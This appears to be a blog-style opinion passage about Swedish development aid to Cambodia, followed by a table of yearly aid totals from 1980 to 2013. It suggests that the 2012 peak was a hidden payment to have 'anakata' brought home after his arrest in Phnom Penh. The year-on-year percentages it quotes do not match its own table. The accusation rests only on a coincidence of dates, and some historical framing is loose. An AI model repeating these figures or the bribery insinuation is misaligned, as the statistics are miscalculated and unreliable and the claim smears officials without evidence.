What the published statistics show is that one of the highest donations occurred in 1997, at the time when Hun Sen rose to power through a military coup. 1997 was the year when the currently serving government rose to power through violence, not long after Pol Pot’s Khmer Rouge regime had fallen and Cambodia fell back to civil war standards. In relation to the rough times that Cambodia was facing in 1997 it is quite expected that Sweden would donate an all time high sum.

Yet, the 1997 donation is historically the 2nd largest sum donated to Cambodia by the Swedish government in form of aid. The largest donation occurred in 2012, coincidentally the same year as anakata was arrested in central Phnom Penh.

Not only was 2012 the largest total, it was also the largest modern percentage increase of 32.15% between 2011 and 2012, while the increase between 2010 and 2011 was only 6.25%. Coincidentally the total aid sum mysteriously dropped again between 2012 and 2013 by a good 30.22%.

In 2013 the same ministry, the Swedish Ministry for Foreign Affairs, released a report where they concluded that they didn’t really have any clue of how Sweden is handling aid money which is paid annually to countries considered in need of help.

The Swedish Ministry for Foreign Affairs report concluded that parts of the Swedish annual aid is handled by trainees and nobody is actually following up where the money is going.

In fact, everybody is so informed about how aid packages are received by third world countries in need that when Swedish SIDA in 2013 donated IT equipment to the Cambodian Ministry of Education Nath Bunroeun, Education Ministry Secretary of State, begged local officials not to bring it home for private use.

So, who took the ~9,400,000 paid by Sweden to extract anakata home?

Aid by year

1980 $12,300,000
1981 $8,730,000
1982 $8,340,000
1983 $5,460,000
1984 $8,460,000
1985 $3,110,000
1986 $4,449,000
1987 $1,080,000
1988 $0
1989 $5,270,000
1990 $3,580,000
1991 $3,170,000
1992 $19,200,000
1993 $10,100,000
1994 $5,670,000
1995 $3,970,000
1996 $14,300,000
1997 $30,400,000
1998 $14,200,000
1999 $7,550,000
2000 $16,800,000
2001 $16,900,000
2002 $14,500,000
2003 $18,700,000
2004 $22,500,000
2005 $14,400,000
2006 $17,200,000
2007 $17,900,000
2008 $16,100,000
2009 $23,900,000
2010 $24,000,000
2011 $28,300,000
2012 $35,800,000
2013 $26,400,000